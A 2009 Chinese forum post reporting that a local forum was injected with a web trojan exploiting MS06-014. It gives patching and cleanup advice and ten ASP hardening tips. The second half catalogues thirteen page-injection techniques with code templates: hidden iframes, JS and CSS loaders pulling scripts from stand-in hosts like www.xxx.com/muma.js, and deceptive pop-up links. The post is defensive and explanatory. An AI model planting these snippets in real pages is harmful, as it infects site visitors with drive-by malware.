|
|
这几天论坛被挂马了,昨晚我才捕获到一些信息,在这里跟大家交流下,行内的和行外的都请看一下,我不认识站长,希望谁认识的,把这里面的信息传达一下。
这是个典型的商业性网马,原理是病毒作者通过服务器漏洞,注入了asp脚本命令,获得了管理员权限,在六安论坛的网页源码里添加了一个指向:http://14647.cn/x86/Td14.htm(请勿点击)的命令。
再经过跟踪,发现这个木马数据库的IP地址是202.102.192.164,安徽省合肥市 电信
捕风捉影的话我就不多说了,下面我只谈一些技术性的东西,大家都来探讨一下。
攻击通道:Maxthon.exe
攻击说明: 该攻击对您的电脑做出了如下操作:
漏洞对象名:scripting.filesystemobject
创建对象:bd96c556-65a3-11d0-983a-00c04fc29e36
该程序对应的漏洞MS06-014 Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码。
解决办法:这是个技术含量比较低的挂马方式,可能是攻击者买的是比较便宜的网马。
他捕获的漏洞也是比较陈旧的了,对用户影响不大。现在大家装的大都是XP SP3,系统里应该打过MS06-014补丁。
MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) 4月11日,微软安全中心发布了2006年4月漏洞安全公告:MS06-014危害等级为“严重”,请广大用户尽快到微软官方网站下载微软最新补丁。编号:MS06-014名称: Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码KB编号: 911562等级:重要摘要: 此更新可消除一个秘密报告的新发现漏洞。 本公告的“漏洞详细资料”部分中对此漏洞进行了说明。 如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 没打过这个补丁的用户要即时更新,很简单的,用360.金山独霸等工具都能轻松搞定。介绍大家一款软件:windows清理助手,这是个免费软件,大家去官网下载一个,安装后清理一下,杀毒软件全盘扫一下,基本没什么事了。 下面是给六安论坛站长的一些建议:仅供参考 ASP木马防范的十大原则
1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!
3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。建议我瑞星的用户使用.mdb的数据库文件扩展名,因为瑞星公司服务器设置了.mdb文件防下载功能。
5、要尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护,并注意空间中是否有来历不明的asp文件。
10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
下面是几种常见的挂马方式:
1) 框架挂马
<iframe src=地址 width=0 height=0></iframe>
2) js文件挂马
首先将以下代码
document.write("<iframe width=Ɔ' height=Ɔ' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
3) js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
4) 邮件木马
<html>
<body>
<iframe src=网页木马地址 width=0 height=0></iframe>
</body>
</html>
5) flash木马
http://网页木马地址 插入木马地址
width=10 height=10", "GET" 宽度和高度,方式
后面的照添,更改木马地址就可以了。
6) 不点出现连接的木马
<a href="http://www.163.com(迷惑的超级连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="你的木马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
menubar=no,scrollbars=no,resizable=no,
copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
7) body挂马
<body ></body>
8) 隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'
9) css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
10) JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
11) 图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
12) 伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
13) 高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容</a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
很明显,这次论坛被挂马,作者就是用了最后一种方式。
先说这么多吧,看看是什么反响。
大家掌声鼓励一下。 |
评分
-
查看全部评分
|
皖公网安备34150102000243号
IP卡
狗仔卡
发表于 2009-9-23 10:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2009-9-23 12:06